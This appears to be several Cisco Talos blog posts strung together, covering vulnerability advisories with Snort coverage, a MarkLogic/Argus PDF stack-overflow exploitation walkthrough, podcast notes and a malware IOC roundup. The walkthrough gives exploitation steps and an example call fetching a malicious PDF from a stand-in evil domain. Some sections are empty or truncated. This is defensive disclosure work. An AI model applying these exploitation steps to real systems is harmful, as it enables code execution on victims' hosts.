Multiple information disclosure vulnerabilities have been identified in the Windows kernel that could allow an attacker gain information about the host. These vulnerabilities manifest due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit these vulnerabilities and leverage the information to further compromise the host.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8679
• CVE-2017-8709
• CVE-2017-8719

CVE-2017-8708 - Windows Kernel Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information which could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. This vulnerability manifests due to the kernel failing to properly initialize a memory address. An attacker who runs a specially crafted executable could exploit this vulnerability and obtain the "base address of the kernel driver from a compromised process," allowing an attacker to leverage the information to further compromise the host.

CVE-2017-8716 - Windows Security Feature Bypass Vulnerability

A vulnerability has been identified in Windows Control Flow Guard that could allow an attacker bypass its intended function. This vulnerability manifests due to the Control Flow Guard mishandling objects in memory. An attacker who runs a specially crafted executable on an affected host could exploit this vulnerability.

CVE-2017-8699 - Windows Shell Remote Code Execution Vulnerability

An arbitrary code execution vulnerability has been identified in the Windows Shell that could allow an attacker to execute code in the context of the current user. This vulnerability manifests as a result of Window Shell improperly validating file copy destinations. An attacker who opens a specially crafted file could exploit this vulnerability. Scenarios where end-user could be compromised include email-based attacks, where an attacker send the victim a malicious attachment that the user opens, or a web-based attack where the user downloads and opens a malicious file.

Vulnerabilities Rated Moderate

The following vulnerabilities are rated "moderate" by Microsoft:

• CVE-2017-8723 - Microsoft Edge Security Feature Bypass Vulnerability
• CVE-2017-8735 - Internet Explorer Memory Corruption Vulnerability

The following briefly describes these vulnerabilities.

CVE-2017-8723 - Microsoft Edge Security Feature Bypass Vulnerability

A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass the Content Security Policy (CSP) feature. This vulnerability manifests due to improperly validating certain specially crafted documents. Successful exploitation could allow an attacker to redirect users to a malicious web page. Users who visit a specially crafted web page under the control of the attacker could be exploited. Alternatively, users who visit a compromised web page or who get served a malicious advertisement an attacker has injected into an advertising network could be exploited.

CVE-2017-8735 - Microsoft Edge Spoofing Vulnerability

A vulnerability in Edge has been identified that could allow an attacker to spoof content on a targeted host. This vulnerability manifests due to improper parsing of HTTP content. Successful exploitation of this vulnerability would result in the user being redirected to a web site of the attacker's choosing. This web site could then spoof content or serve as part of an exploit chain whereby the user could be exploited via another vulnerability. Scenarios where a user could be attacked include email or instant message vectors where the user clicks on a malicious link, or if the user navigates to a specially crafted web page under the control of the attacker.

Coverage

In response to these vulnerability disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules:

• 42285-42286
• 42311-42312
• 42749-42750
• 44331-44336
• 44338-44343
• 44349-44350
• 44353-44357

This vulnerability was discovered by Cory Duplantis of Talos

Overview

LibOFX is an open source implementation of OFX (Open Financial Exchange) an open format used by financial institutions to share financial data with clients. As an implementation of a complex standard, this library is used by financial software such as GnuCash. Talos has discovered an exploitable buffer overflow in the implementation: a specially crafted OFX file can cause a write out of bounds resulting in code execution. This vulnerability is not currently patched and Talos has not received a response from the developers within the period specified by the Vendor Vulnerability Reporting and Disclosure Policy.

TALOS-2017-0317 (CVE-2017-2816) - LibOFX Tag Parsing Code Execution Vulnerability

Ironically, the vulnerability is located in the way that tags are parsed by the sanitize function. In the function, the tag's names are stored locally on the stack, a too long tag name results in a stack overflow.

More details can be found in the vulnerability reports:TALOS-2017-0317

Tested Version: LibOFX 0.9.11

Discussion

As an open source library, LibOFX may be used in various financial applications. This vulnerability presents many attractive features for attackers. User interaction is not necessarily required to trigger the vulnerability, and any systems presenting with this vulnerability are likely to contain valuable financial information which can be stolen to conduct identity theft, fraud, or easily sold on to other criminals.

Organisations may not be aware of the presence of this library being used to parse OFX files in third party software, or in software that has been developed as part of an in-house system. Keeping track of open source libraries used within in-house projects, and quickly applying patches supplied by third party vendors is vital to ensure that vulnerabilities such as these, which are particularly enticing to attackers, are properly managed.

Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 42277-4227

Overview

TALOS-2017-0305 Remote Code Execution Vulnerability in Ansible-Vault Library. (CVE-2017-2809)

TALOS-2017-0307 Remote Code Execution Vulnerability in Tablib. (CVE-2017-2810)

Coverage

This post authored by Marcin Noga with contributions from William Largent



Talos discovers and responsibly discloses software vulnerabilities on a regular basis. Occasionally we publish a deep technical analysis of how the vulnerability was discovered or its potential impact. In a previous post Talos took a deep dive into Lexmark Perceptive Document Filters, in this post we are going to focus on another converter used by MarkLogic located in `Converters/cvtpdf` folder, which is responsible for converting pdf to XML-based formats - Argus PDF. This blog will cover the technical aspects including discovery and exploitation process via the Argus PDF converter.

How exactly does it affect MarkLogic?

Before getting into the details watch this video which shows remote code execution tested on Marklogic 8.0-5.5 on Windows,, obtaining SYSTEM level privileges!


By using the dll in Argus PDF and the converter binary we can find the converter in the Marklogic directory at the following location:


How exactly can we force MarkLogic to use this converter? Marklogic uses this converter each time XDMP API "pdf-convert" is used.

From the documentation’s description of this API:


Example of usage -- where the pdf we want to convert is read from an untrusted source::

xdmp:pdf-convert( xdmp:document-get("http://evildomain.localhost.com/malicious.pdf"), "malicious.pdf" )

When the above "pdf-convert" API is called, the MarkLogic daemon spawns the "convert" binary, along with the use of the Argus.dll, which is responsible for converting the pdf into (x)html form.

Increased damage

As in our previous exploitation example, in the newer version of MarkLogic on Windows the "convert" component is spawned by MarkLogic without dropping privileges so "convert" performs its tasks with SYSTEM privileges! That dramatically increases the impact of successful exploitation because we gain the highest privileges on the system automatically.

Recon

During the research related to this product Talos found multiple vulnerabilities in Iceni Argus PDF lib. To demonstrate the exploitation process we will use CVE-2016-8335 (TALOS-2016-0202) Iceni Argus ipNameAdd Code Execution, which is a classic stack based buffer overflow.

Linux version

First let’s examine how the linux version of this converter will act when we attempt to convert our malformed pdf file:


In this case the `convert` library has been compiled with security cookies which would make exploitation more difficult, though it is worth mentioning that this mechanism can be bypassed in certain conditions. You can read a great example of this in Bypassing MiniUPnP Stack Smashing Protection by Talos’ Aleksander Nikolic.


Existence of security cookies and a confirm checksec:


Again we see that the `convert` executable does not support ASLR.

Windows

Ok, let’s check it on Windows:



Perfect, no stack cookies so exploitation should be straightforward. For further information on the triaging process see the details in the advisory available here. The following is a summary version where we will give general details about what went wrong and how to trigger this vulnerability.

Steps to Rule Them All

1. Vulnerability exists in function `ipNameAdd`.
2. Vulnerable code.

Line 12 contains buggy strcpy call

3. Attacker creating `token` not being "regular" `Name object`, Integer, Float, or HexString will cause a stack based buffer overflow leading to arbitrary code execution.
4. pdf example triggering this vulnerability.

5. The overflowing "string"/chain of bytes can contain characters in the range [0x21-0xff] without 0x80.

Now we have all the necessary information and can start moving into the exploitation process.

Exploitation

Cyclic Pattern

How many bytes are needed to overwrite the RET address?

We will use Immunity Debugger with mona.py to obtain that info, generate a cyclic pattern, and replace the overflowing "AAAA..." string in our pdf.



Re-Run our app :



Bingo! EIP has been overwritten with our cyclic buffer using `!mona pattern_offset (po) eip` command. We get the info for our EIP value at offset 260.

We can make our proof of concept exploit by overwriting EIP with our controlled value:

Building the Exploitation Strategy

We have the exploit skeleton and can control EIP, now let’s check the loaded module and the mitigations implemented to have a clear picture of what path we should take to successfully exploit this case.

Lack of mitigations?! NO DEP !!!

Do our eyes deceive us? The executable file does not support DEP/ASLR and none of it is used by the modules. That means that you can turn on your favorite song from 90’s sit back and feel once again the charm of direct-ret jmp esp exploits, now in 2017!

Direct-RET

Generally we just need to find the "jmp esp" instruction and remember about constraints:



"-x *" because we don't care about whether page has "X (executable)" permission set, our pointer also has some limitation but to simplify it we will restrict it to "-cp alphanum" and throw out "-cpb \x20".

Shellcode

The same constraints used during shellcode generation :




Worth noting here is that we need to tell the encoder where the start address of our shellcode is located. In our case this address is in the ESP register and we pass that info to the encoder via "BufferRegister=ESP"

PoC

Now we can test our exploit:

Summary

This deep dive provides a clear view into the process of taking a vulnerability and weaponizing it into a useable exploit. Just because a vulnerability exists does not mean that it is easily weaponized, in most circumstances the path to weaponization is arduous. However, this also significantly increases the value of the vulnerability, depending on the methodology required to actually exploit it. Cisco Talos will continue to discover and responsibly disclose vulnerabilities on a regular basis including further deep dive analysis.

Beers with Talos (BWT) Podcast Episode 12 is now available.  Download this episode and subscribe to Beers with Talos:
If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

Beers with Talos is a fast-paced, smart, and humorous podcast focused on security research topics. Staying abreast of security topics is difficult in this rapidly evolving threat landscape. Beers with Talos serves important security stories in a way that is understandable, engaging, and fun to researchers, executives, and security n00bs alike.

EP12 Show Notes: 

Matt runs the ship this week in Mitch’s absence. Craig and Nigel are joined by Bill Largent and Joel was… in a meeting? The crew discusses ambulance chasing and crying wolf in the security industry and also what the security press is doing to perpetuate questionable reporting. We also chat at length about what exactly goes into vulnerability discovery, chaining exploits, and the months of work to get to those “12 seconds” of glory at Pwn2Own.

Did we mention the internet ate our last podcast? Sorry about that. We do our best to make up for missing a week this time. But man, that was a great episode you missed…

EP12 Timetable:

01:05 - Introducing Bill Largent
02:02 - Olney’s roundtable - I don’t care what you want to talk about
07:08 - What you should know BEFORE going out with Talos
10:14 - Craig’s Roundtable
17:12 - What’s with the ambulance chasing in Security?
24:14 - Causing harm by not doing good - problems with Security media
37:50 - What is involved in vuln discovery and exploitation?
50:29 - Closing thoughts
==========
Special guest: Bill Largent (@security_will)
Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff)

Find all episodes:
http://cs.co/talospodcast

Subscribe via iTunes (and leave a review!)
http://cs.co/talositunes

Check out the Talos Threat Research Blog:
http://cs.co/talosresearch

Subscribe to the Threat Source newsletter:
http://cs.co/talosupdate

Follow Talos on Twitter:
http://cs.co/talostwitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between September 08 and September 15. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

• Doc.Downloader.Agent-6336340-0
  Office Macro Downloader
  This set of downloaders uses string obfuscation in VBA to build a download command for the shell and execute it with the VBA Shell function.
   
• Doc.Macro.Obfuscation-6336210-0
  Office Macro
  This cluster of Office Macro documents use the same obfuscation technique to prevent quick analysis. Unused strings and comments make up a majority of the script's content.
   
• Doc.Trojan.Valyria-6336191-0
  Trojan
  This set of downloaders uses string obfuscation in VBA to build a download command for a powershell command and execute it with VBA Shell function.
   
• Rtf.Exploit.CVE_2017_0199-6335035-0
  Exploit
  These are RTF documents which contain an embedded OLE2 object. The authors try to obfuscate the OL2E object by inserting dummy command in between the object's data in the RTF document. The OLE2 objects, in turn, contain links to another document. If the linked document is a .hta file, it is downloaded and executed in the context of the RTF document. This vulnerability is known as CVE-2017-0199.
   
• Win.Malware.Cmig-6336177-0
  Packer
  Cmig is a packer that can be used to obfuscate a number of malicious payloads such as banking trojans. It has recently been used in recent phishing campaigns with filenames like 'Transfer_copy.pdf.scr' and '(PO) No.2029243EL0003.exe'.
   
• Win.Malware.Ursnif-6336328-0
  Trojan/Downloader
  Ursnif is used to steal sensitive information from an infected host, but can also act as a malware downloader. We have seen an increase in its infection rate via a recent malspam campaign that is targeting Japanese recipients with an XLS downloader attachment. This particular variant relies on an excessively long main function for its unpacking, resulting in a CFG (control flow graph) that exceeds 1000 nodes. It also relies on API hammering & additional API resolution prior to copying the unpacked code to the heap for further execution.
   
• Win.Trojan.Agent-1356499
  Trojan
  This sample is a Trojan and it tries to communicate with external servers. The samples are packed and they contains anti-VM checks. However the samples run in an instrumented environment. During the analysis, they contact many domains and among them VirusTotal. Surprisingly, they upload a sample for the scan. Moreover, the samples modify the IDT and download additional files.
   
• Win.Trojan.Symmi-6336247-1
  Trojan
  This variant of Symmi creates additional binaries and gains persistence by creating a scheduled task and adding the path of a malicious DLL in the AppInit_DLLs registry value, which allows it to be loaded into each user-mode process running in the system.
   

---

Threats

Doc.Downloader.Agent-6336340-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• \BaseNamedObjects\Global\VLock

IP Addresses

• 216[.]239[.]38[.]21
• 216[.]239[.]34[.]21
• 88[.]150[.]140[.]232
• 216[.]239[.]32[.]21
• 185[.]99[.]2[.]75
• 5[.]133[.]179[.]13
• 78[.]47[.]139[.]102
• 103[.]27[.]235[.]82
• 192[.]168[.]1[.]255
• 192[.]168[.]1[.]1
• 216[.]239[.]36[.]21
• 127[.]0[.]0[.]4
• 93[.]171[.]217[.]7
• 192[.]168[.]1[.]248

Domain Names

• 12[.]242[.]40[.]8[.]zen[.]spamhaus[.]org
• myexternalip[.]com
• ipinfo[.]io
• tregartha-dinnie[.]co[.]uk

Files and or directories created

• \Users\Administrator\Documents\20170913\PowerShell_transcript.PC.hwKj6ylW.20170913092128.txt
• \Users\Administrator\Documents\20170913\PowerShell_transcript.PC.EvG+kj6G.20170913092130.txt
• %AppData%\winapp\Modules\systeminfo64
• %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\697359.cvr
• %AppData%\winapp\Modules\injectDll32
• %TEMP%\ytkqvnx_o.exe
• %AppData%\winapp\qbmw.exe
• %TEMP%\CVR40C2.tmp.cvr
• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\rcnx.exe
• %AppData%\winapp\group_tag
• %WinDir%\Tasks\services update.job
• %TEMP%\gytdgo9.bat
• %AppData%\winapp\Modules\injectDll64_configs\dpost
• %System32%\Tasks\services update
• %AppData%\winapp\Modules\injectDll64_configs\dinj
• %AppData%\winapp\xsjpumw_n.exe
• %AppData%\winapp\palv.exe
• %AppData%\winapp\Modules\injectDll64
• %AppData%\winapp\Modules\systeminfo32
• %AppData%\winapp\client_id
• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\wvzyhlyh.bat
• %AppData%\winapp\Modules\injectDll64_configs\sinj

File Hashes

• 3efbea8e97b2e4c5b0c03bb940cbd6f9387627ed6977844bcc69613738089caa
• a8d06bd505e658dd9274b4c8ba0805d8c9b19ee65a8eb7fe6a3c388487dc0875

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

---

Doc.Macro.Obfuscation-6336210-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS
• Value: dz~
• <HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS
• Value: oy~
• <HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\42D7BE7E
• Value: 42D7BE7E

Mutexes

• N/A

IP Addresses

• 52[.]173[.]193[.]166
• 174[.]136[.]52[.]222

Domain Names

• tmsgroup[.]mx

Files and or directories created

• %TEMP%\myfileepepe.exe
• \TEMP\propuesta_de_trabajo_795370.doc
• \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40DVD2HR\sound[1].htm

File Hashes

• b980586f7fe22ae71badba8d2b202115f98821b743593ca36e15387fbda4f361
• 0dd881a73d020780715e7a4ee943288fe5174ff27ae3ae90405785e8f584c225
• 179d8ad5e80d814aa8d04633ac9c624b60f2273e50dcd6ae5fd7441522ea714e
• 52568babc56f75ce343d9d8bf5ecb51af0a6d9d31fa60a2875b116a81064ee78
• 6891e0c2fe9c3b7bf9c02fbd81950c60118df47cf8e7d80ca92853fae72d9178
• 7df129105042ea8a4270ca975b97456bc819264864bf2992538a2558c3da9146
• 9416f466a01d60b4bccaf8658b0a78bbe84a8de3a1bc1abb77e541e224a6c197
• ad07da4920298c11f896748053f37a1a532d7b10077af762f4e0b8ca60d6b4a2
• b2158897b2fcd2ab2e6304c5c9da2d7af506356ded5b9e63d4421c5565d11123
• d0b4b36c3c50c58869ae58f34c9d05c4ae8333e20d29b6c35d85cc85a5d7e38c
• d4a60bcec8d6317d30262bfaa2d5c425c60d1cc42827f37b2fc7fbb5795a1557
• e03707413922ee8af0178296855bda42f2e0e86f1e34a63022dfd6e582cecd61
• e9e03d8cf474e69197beefecdb5db453740cb4349535dffe4476febee8e5fc8b
• 012852f831aa5af389baf81195874e6423d87959989787fc6921823c1bfbe293
• 1a0d042c3e9c5a0e3b36981e436b30cf5b40139f61877f6011a2c6b8934dc5fa
• 321fb4eb45e839e819b923aebb59c20368dd5c232e1a429fd4a41b8ee70d785c
• 3d27ace6341c0756a8a57f915e6e71fd7fd21661f1b2f0b4019199f5ae5ac30d
• 40e07a6ac949b795a75c679811ace193aa3b53dcb29c4b88ca936b6a47a1f04d
• 428810965b8c6bb09b66c83369382106d76be71f5e706622f862afd130008fdb
• 4c45540ba41c37f6c4cc0c4385139b63e56e58798c1c3ac94ea9cfca15ab8a98
• 4f4e875d64ecbc8f2aa485118d64419c9070b237171805acd9de5b04594f524e
• 51e75edc5abe46280a4ef590047bb0bf4ab0d409da07711cbd2917b4ce103c59
• 5329d1922d2e40d124aea198b8b19baa2382b52f8990f2112a396a4f6250f765
• 582e025a0a45e73aa4568cbef75d53f402dd48a941256730ffb0dacfab5ac71b

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Doc.Trojan.Valyria-6336191-0

Indicators of Compromise

Registry Keys

• HKU\Software\Microsoft\Windows\ShellNoRoam\MUICache

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• workupe[.]us
• kekeoffer[.]com

Files and or directories created

• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\vhost.exe

File Hashes

• 02a384b45673cf0c1e7dbe129fa397d92d43add25b22b080b4308def418e7927
• 0e0edccb33a141f7a9f2f57590c33eb22b599f3b2a070bf930083b5d0053fdb2
• 2c421d3fe1bce958f7a47ffa6a74ee7b6b6d0e90c95e230eced7a883d9db2505
• 31a70dff6c1abfc4a0074a72e2e45ad6e50cdb8cf9ab023655f21d4c770d6946
• 4c16cda58dbd96b74579eafe2a73740c6d98d588bdebee6a3830140d1326aafd
• 532b0c407a2c8ae3adf7c148ae64e63d8dd92fb624802d3f3992e87445274a73
• 568f8b461fe97728ebca0231b5b8b00bc85de9909ab83c7d2fc60d134739819f
• 59400bc70eab4810a1b7a5c8556879315cdc2233b51e812587fe259a3dde69a6
• 64b2b883632292f6d1bbbba7c95973a3f47c36bf70c940f262caaeb3422786c4
• 68edb052cd861ebe7dad58a9923723c1ed711ec4d965ba13a3cf10d70a90d11f
• 6df3fb420cba5fb279edfc1724af82cfd28a63c7121fb123846db6edf1594a17
• 7291b9989f4ef506f1792dd4bae6d7f8b1d4f7c770295552a05acf38a41c0b26
• 764b5f6e36f12e80dd801db166f6c1357745a1c7a5526c00e1a1eb057624f56c
• 7eed89f56f776f61421242f428edc4a93bd250e8b98fe44b6f71a67ec8a3fb08
• 80c33e29b5221557070d70c81c72b0866a7a916490fdc2bee4644f057e844283
• 8263c8ab8cf63264e39de0c237e26c7f08e36427ec47e0699f7ff8726af40db5
• af2229c42175b9c6591427f82619564c8a8a1fcb1fa3f912502b098563c12643
• af91e3a9413567bbea70a7d91b3ea4377608d0120a0e8feccab149dd2b4e497b
• b6ba50de7e2573d32975f60905d3fcd3a67bd57d5f2925a3cf7fddefae174c6e
• c9210ef989809971703aea1b0d12b83aa85fcc7e0547b877b6645456d4945051
• e9d062f1b899f805c95b79165873b6c4e7eb6ec3185347ec0d67e2d30caff67b
• f543e6e17ca16d883f3da521b9c8e0070ab7a1ee6c83eb8bca701bea7af6385f

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Rtf.Exploit.CVE_2017_0199-6335035-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• 172[.]16[.]1[.]57

Domain Names

• www[.]supernaturalspells[.]co[.]za

Files and or directories created

• N/A

File Hashes

• 2d605f0e93b94536f6e2ae7060ebca59ead7dcde70dc3ea5dc99d2ed5a391afa
• 9b366a6ab581517c6d62c5195e606eba6cb764ff813df7c247f34455af7db567
• 148c4c8b544dce269b28f6d5166ff65a72d365045ce02ca36f0554834a07d7a5
• 29c4a742042b6065bc4e30c1d06c0b8b83218c87d922c024f172fc39764d1d5d
• dc730f033912235910103a20eb1c46f4c4c50e221d985a156fb7ef384c5b1bc4

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Malware.Cmig-6336177-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• N/A

File Hashes

• 01f78108dacea6db392dfc6700e987754cb15aaab6f8ff85ae9349f4fcef1044
• 05baa0dc22cf5b14b5a8e70c4a0183c50f366da7916fdee0f1b26835f48e43c1
• 0898ded2110056e9bc720860640282384f08d4064918322cf99c6e79554208f6
• 09e7612bce428fb51593cfc286d7e9904a1c372771a7ad1870538a4a72046d15
• 12b2c3dd430777d50966f542668eb022b2871a3c2ec77003911080fa90c32c5b
• 14eeda627d8c65edea9e8c7b3a02f381079f1c28be3f1408a0f6f4f0968da27c
• 1828387d77ccd498e318dc2bdf580a51ef8161dfda186651cb4c6300aea6ecf5
• 251984e04c9654cab912e5ab74f510c808a3fd34bc10d81f20eef7350dc51339
• 28c5bd99d92cf80443f93cb12344cade4e9685a89e936d490b9e04edd6207f1a
• 2b9d669d44fb21199c4ad9f51566d641cb1613907c1a8f66c49c3a0766fbd386
• 2fe55bd75831905bd35b0928ecd70f064330311ec0749bda01cff595b9af6b27
• 359c0c9d53f14552ede1a37f73b4554f8fa8004ec0a25a6b6741dfd4f2df5682
• 3706c1b476c5a7093dbf71f51daa053d817668b854b99ef8ab939f2498fe253f
• 3d3d7e837aafbd8f42ade61f867114cc28af14c5d4ace788f351df0ad58cadf1
• 3ee7edf180cc44da6f2f79f90cc965dddb0eee97e32d9e340e873c71ce3d57e0

Coverage

Screenshots of Detection

AMP

ThreatGrid

---

Win.Malware.Ursnif-6336328-0

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• N/A

File Hashes

• 46da8289c027a187b14826f3648d61c187398ad170ef60ec3311b5dae3b52d61
• 6f2af5771522f2ce3843f57c2a72a2451e0b73a71505cd50abad031267915be3
• a753a288318dd38709ac1c26374cdc1fdb930b8476788d2868a1cae79cc8f352

Coverage

Screenshots of Detection

AMP

ThreatGrid

---

Win.Trojan.Agent-1356499

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
• Value: ConsoleTracingMask
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: AutoDetect
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
• Value: FileDirectory
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: UNCAsIntranet
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
• Value: FileTracingMask
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyEnable
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
• Value: FileDirectory
• <HKU>\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\34\52C64B7E
• Value: LanguageList
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
• Value: SavedLegacySettings
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: IntranetName
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
• Value: FileTracingMask
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
• Value: EnableFileTracing
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyServer
• <HKU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
• Value: MaxFileSize
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
• Value: EnableConsoleTracing
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
• Value: EnableConsoleTracing
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: IntranetName
• <HKU>\S-1-5-21-2580483871-590521980-3826313501-500_CLASSES\LOCAL SETTINGS\MUICACHE\34\52C64B7E
• Value: LanguageList
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: AutoConfigURL
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyOverride
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
• Value: EnableFileTracing
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
• Value: DefaultConnectionSettings
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
• Value: MaxFileSize
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
• Value: ConsoleTracingMask
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CTLs
• <HKCU>\Software\Microsoft\SystemCertificates\My
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\CRLs
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
• <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
• <HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Root
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CRLs
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
• <HKCU>\Software\Microsoft\SystemCertificates\trust
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\CA\CRLs
• <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\SmartCardRoot
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\Certificates
• <HKCU>\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
• <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\TrustedPeople
• <HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Disallowed
• <HKCU>\Software\Policies\Microsoft\SystemCertificates\CA
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLs
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\ROOT\CTLs
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
